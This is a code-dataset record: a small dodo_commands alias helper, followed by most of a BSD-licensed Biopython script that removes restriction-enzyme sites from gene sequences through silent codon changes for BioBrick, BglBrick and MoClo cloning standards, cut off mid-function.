| 38.45935 | 118 | 0.688722 | 1,119 | 9,461 | 5.546917 | 0.103664 | 0.086837 | 0.056388 | 0.072177 | 0.932657 | 0.932657 | 0.924601 | 0.923957 | 0.92299 | 0.90559 | 0 | 0.051221 | 0.195222 | 9,461 | 245 | 119 | 38.616327 | 0.763987 | 0.007822 | 0 | 0.721973 | 0 | 0 | 0.08901 | 0 | 0 | 0 | 0 | 0 | 0.06278 | 1 | 0.03139 | false | 0 | 0.026906 | 0 | 0.058296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
115e62b5047c98cd670be780eb9b04d76ffe5bc3 | 124 | py | Python | dodo_commands/framework/get_aliases.py | mnieber/dodo-commands | 82330006af2c6739b030ce932ba1ff9078b241ee | [
"MIT"
] | 8 | 2016-12-01T16:45:45.000Z | 2020-05-05T20:56:57.000Z | dodo_commands/framework/get_aliases.py | mnieber/dodo-commands | 82330006af2c6739b030ce932ba1ff9078b241ee | [
"MIT"
] | 75 | 2017-01-29T19:25:45.000Z | 2020-01-28T09:40:47.000Z | dodo_commands/framework/get_aliases.py | mnieber/dodo-commands | 82330006af2c6739b030ce932ba1ff9078b241ee | [
"MIT"
] | 2 | 2017-06-01T09:55:20.000Z | 2017-06-08T14:45:08.000Z | from dodo_commands.framework import ramda as R
def get_aliases(layer):
return R.path_or({}, "ROOT", "aliases")(layer)
| 20.666667 | 50 | 0.717742 | 19 | 124 | 4.526316 | 0.842105 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145161 | 124 | 5 | 51 | 24.8 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0.08871 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
fec290a751966f68364cc8934df8c972477d9f8d | 31,272 | py | Python | WEB/cgi-bin/genestand.py | openbioeconomy/SynBioStandardizer | 8eb7c60a01c898a8220184126903652c509961cb | [
"BSD-2-Clause"
] | null | null | null | WEB/cgi-bin/genestand.py | openbioeconomy/SynBioStandardizer | 8eb7c60a01c898a8220184126903652c509961cb | [
"BSD-2-Clause"
] | 1 | 2015-07-19T12:54:10.000Z | 2017-11-19T20:34:59.000Z | WEB/cgi-bin/genestand.py | openbioeconomy/SynBioStandardizer | 8eb7c60a01c898a8220184126903652c509961cb | [
"BSD-2-Clause"
] | 1 | 2018-08-31T08:07:56.000Z | 2018-08-31T08:07:56.000Z | #####
#
# Synthetic Biology Gene Standardizer
# Copyright (c) 2015, Tyson R. Shepherd, PhD
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors.
#
#####
import sys
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
from Bio.Restriction import *
from math import *
#
# Meat and potatoes
#
def refactor( outSeq, recSeq, changes, stnds ):
"Refactor sequences: outSeq is output sequence, record is input, changes is mutations"
outSeq.seq = outSeq.seq.upper()
recSeq.seq = recSeq.seq.upper()
m = 1
while m == 1:
m = 0
if str(outSeq.seq[0:3]) != 'ATG':
A = 'Start Codon: '+str(outSeq.seq[0:3])+'1'+'ATG'
changes.append(A)
outSeq.seq='ATG'+outSeq.seq[3:]
recSeq.seq='ATG'+recSeq.seq[3:]
if 'N' in stnds:
ndeInst = NdeI.search(outSeq.seq)
for i in ndeInst:
m = 1
j = (i - 3) % 3
k = i - 2
if j == 0:
k = k + 2
A = "NdeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC"):
A = "NdeI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
changes.append(A)
A = "NdeI: A"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A" or stK == "G"):
A = "NdeI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "T":
A = "NdeI: TCA"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "NdeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
if 'BglB' in stnds:
xhoInst = XhoI.search(outSeq.seq)
for i in xhoInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "XhoI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
stJ = str(outSeq.seq[k+2])
if (stJ == "A" or stJ == "G"):
A = "XhoI: AG"+stJ+str(k+1)+"CGC"
outSeq.seq = outSeq.seq[:k]+"CGC"+outSeq.seq[k+3:]
elif (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "XhoI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "XhoI: TCG"+str(k-2)+"AGC"
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C":
A = "XhoI: T"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
changes.append(A)
A = "XhoI: A"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
if (('BioB' in stnds) or ('BglB' in stnds)):
ecoInst = EcoRI.search(outSeq.seq)
for i in ecoInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "EcoRI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "EcoRI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "EcoRI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "EcoRI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "EcoRI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "EcoRI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "EcoRI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK == "A":
A = "EcoRI: "+stK+"GA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "G":
A = "EcoRI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "T":
A = "EcoRI: G"+str(k-4)+"A"
outSeq.seq = outSeq.seq[:k-6]+"TAA"+outSeq.seq[k-3:]
else:
A = "EcoRI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
if 'BioB' in stnds:
xbaInst = XbaI.search(outSeq.seq)
for i in xbaInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 3
A = "XbaI: AGA"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
elif j == 2:
k = k + 3
A = "XbaI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "XbaI: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
speInst = SpeI.search(outSeq.seq)
for i in speInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "SpeI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
A = "SpeI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "SpeI: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
pstInst = PstI.search(outSeq.seq)
for i in pstInst:
m = 1
j = (i - 6) % 3
k = i - 5
if j == 0:
k = k + 5
stK = str(outSeq.seq[k-1:k+5])
if (stK == "GGATCT" or stK == "GTGCAT"):
A = "PstI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
else:
A = "PstI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
stJ = str(outSeq.seq[k-8:k-4])
if stJ == "GAAT" or stJ == "AAAT":
A = "PstI: C"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC":
A = "PstI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "AG" or stK=="AC" or stK=="CA":
A = "PstI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
else:
A = "PstI: C"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK=="G":
A = "PstI: T"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "PstI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
mfeInst = MfeI.search(outSeq.seq)
for i in mfeInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 3
A = "MfeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "MfeI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif (stK == "AG" or stK == "AC" or stK == "CA"):
A = "MfeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
else:
A = "MfeI: C"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A" or stK == "G"):
A = "MfeI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "T":
A = "MfeI: TCA"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "MfeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
avrInst = AvrII.search(outSeq.seq)
for i in avrInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 3
A = "AvrII: AGG"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
elif j == 2:
k = k + 3
A = "AvrII: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "AvrII: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
nheInst = NheI.search(outSeq.seq)
for i in nheInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "NheI: T"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
A = "NheI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "NheI: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
nsiInst = NsiI.search(outSeq.seq)
for i in nsiInst:
m = 1
j = (i - 6) % 3
k = i - 5
if j == 0:
k = k + 5
A = "NsiI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK=="CA" or stK=="GC" or stK=="CT" or stK=="CC" or stK=="AC"):
A = "NsiI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "GT":
A = "NsiI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif (stK == "AT" or stK == "CG"):
A = "NsiI: A"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif (stK == "GG"):
A = "NsiI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "NsiI: AGA"+str(k-3)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "TT":
A = "NsiI: TTA"+str(k-3)+"CTG"
outSeq.seq = outSeq.seq[:k-6]+"CTG"+outSeq.seq[k-3:]
elif stK == "TC":
A = "NsiI: TCA"+str(k-3)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "NsiI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k+1:k+3])
if (stK == "TA" or stK == "TG"):
A = "NsiI: T"+stK+str(k+1)+"CTG"
outSeq.seq = outSeq.seq[:k]+"CTG"+outSeq.seq[k+3:]
else:
A = "NsiI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
if 'BglB' in stnds:
bglInst = BglII.search(outSeq.seq)
for i in bglInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 0
A = "BglII: AGA"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK=="CA" or stK=="GC" or stK=="CT" or stK=="CC" or stK=="AC"):
A = "BglII: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "GT":
A = "BglII: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif (stK == "AT" or stK == "CG"):
A = "BglII: A"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif (stK == "GG"):
A = "BglII: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BglII: AGA"+str(k-3)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "TT":
A = "BglII: TTA"+str(k-3)+"CTG"
outSeq.seq = outSeq.seq[:k-6]+"CTG"+outSeq.seq[k-3:]
elif stK == "TC":
A = "BglII: TCA"+str(k-3)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "BglII: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k+1:k+3])
if (stK == "TA" or stK == "TG"):
A = "BglII: T"+stK+str(k+1)+"CTG"
outSeq.seq = outSeq.seq[:k]+"CTG"+outSeq.seq[k+3:]
else:
A = "BglII: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
bamInst = BamHI.search(outSeq.seq)
for i in bamInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "BamHI: A"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "TT" or stK == "TA" or stK == "AA" or stK == "GA"):
A = "BamHI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif (stK == "CG" or stK == "AC" or stK == "GC" or stK == "GG"):
A = "BamHI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "GT":
A = "BamHI: G"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif stK == "TC":
A = "BamHI: TCG"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BamHI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
else:
A = "BamHI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A"):
A = "BamHI: "+stK+"GG"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK=="G":
A = "BamHI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "BamHI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
if 'BioB' in stnds:
notInst = NotI.search(outSeq.seq)
for i in notInst:
m = 1
j = (i - 3) % 3
k = i - 2
if j == 0:
k = k + 5
A = "NotI: C"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "AA" or stK == "GA"):
A = "NotI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "NotI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "NotI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "NotI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "NotI: G"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
A = "NotI: C"+str(k-3)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
apoInst = ApoI.search(outSeq.seq)
for i in apoInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "ApoI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
A = "ApoI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "ApoI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
if 'MoClo' in stnds:
bbsInst = outSeq.seq.find("GAAGAC")
if bbsInst > 0:
m = 1
j = bbsInst % 3
k = bbsInst + 1
if j == 0:
k = k + 2
A = "BbsI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "AG"):
A = "BbsI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
changes.append(A)
A = "BbsI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 1:
k = k + 2
A = "BbsI: AGA"+str(k)+"CGT"
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
changes.append(A)
bbsInst = 0
bbsInst = outSeq.seq.find("GTCTTC")
if bbsInst > 0:
m = 1
j = bbsInst % 3
k = bbsInst + 1
if j == 0:
k = k + 2
A = "BbsI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "BbsI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "BbsI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "BbsI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BbsI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "BbsI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "BbsI: TCT"+str(k-2)+"AGC"
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "BbsI: T"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
bbsInst = 0
bsaInst = outSeq.seq.find("GGTCTC")
if bsaInst > 0:
m = 1
j = bsaInst % 3
k = bsaInst + 1
if j == 0:
k = k + 5
A = "BsaI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "BsaI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BsaI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "BsaI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "BsaI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "G"):
A = "BsaI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "A":
A = "BsaI: AGG"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
else:
A = "BsaI: TCT"+str(k-2)+"AGC"
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
changes.append(A)
bsaInst = 0
bsaInst = outSeq.seq.find("GAGACC")
if bsaInst > 0:
m = 1
j = bsaInst % 3
k = bsaInst + 1
if j == 0:
k = k + 2
A = "BsaI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
changes.append(A)
elif stK == "GA":
A = "BsaI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
changes.append(A)
elif stK == "AG":
A = "BsaI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
changes.append(A)
A = "BsaI: AGA"+str(k-2)+"CGT"
outSeq.seq = outSeq.seq[:k-3]+"CGT"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "G"):
A = "BsaI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "A":
A = "BsaI: AGA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
else:
A = "BsaI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
bsaInst = 0
mlyInst = outSeq.seq.find("GAGTC")
if mlyInst > 0:
m = 1
j = mlyInst % 3
k = mlyInst + 1
if j == 0:
k = k + 2
A = "MlyI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "MlyI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "MlyI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "MlyI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "MlyI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "MlyI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK == "A":
A = "MlyI: "+stK+"GA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "G":
A = "MlyI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "T":
A = "MlyI: G"+str(k-4)+"A"
outSeq.seq = outSeq.seq[:k-6]+"TAA"+outSeq.seq[k-3:]
else:
